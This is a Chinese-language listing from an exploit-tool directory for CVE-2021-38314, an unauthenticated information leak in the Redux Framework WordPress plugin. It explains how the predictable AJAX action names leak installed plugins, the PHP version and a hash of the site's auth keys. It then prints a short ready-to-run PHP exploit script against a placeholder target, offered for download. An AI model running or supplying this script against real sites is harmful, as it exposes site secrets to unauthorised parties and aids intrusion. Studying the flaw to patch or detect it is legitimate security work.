Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2021-38314 — cve-2021-38314 - 未认证敏感信息泄露 | Kitploit
工具/GitHubGitHub/twseptian/cve-2021-38314
侦察漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubtwseptian/cve-2021-38314

cve-2021-38314

cve-2021-38314 - 未认证敏感信息泄露

查看仓库
2114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cve-2021-38314 - 未经身份验证的敏感信息泄露

Gutenberg Template Library & Redux Framework 插件 <= 4.2.11 版为 WordPress 在 redux-core/class-redux-core.php 的 includes 函数中注册了多个未验证用户可用的 AJAX 操作,这些操作对特定站点是唯一的,但可确定且可预测,因为它们基于站点 URL 的 md5 哈希(带有已知盐值 '-redux')以及前一个哈希的 md5 哈希(带有已知盐值 '-support')。这些 AJAX 操作可用于检索活动插件及其版本列表、站点的 PHP 版本以及站点 AUTH_KEY 与 SECURE_AUTH_KEY 连接后的无盐 md5 哈希[1][2]

源代码

root@kitploit:~
<?php
$target = "https://target.com";  
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2. '-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");

保存为带有 .php 扩展名的源代码文件

如何运行

使用

参考文献:

  • [1] "CVE - CVE-2021-38314," Mitre.org, 2021. [在线]. 可访问: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314. [访问日期: 2022年5月15日]
  • [2] Rizaldi Wahaz, "Unauthenticated Sensitive Information Disclosure at [REDACTED]," Medium, 2021年11月25日. [在线]. 可访问: https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c. [访问日期: 2022年5月15日]
下载工具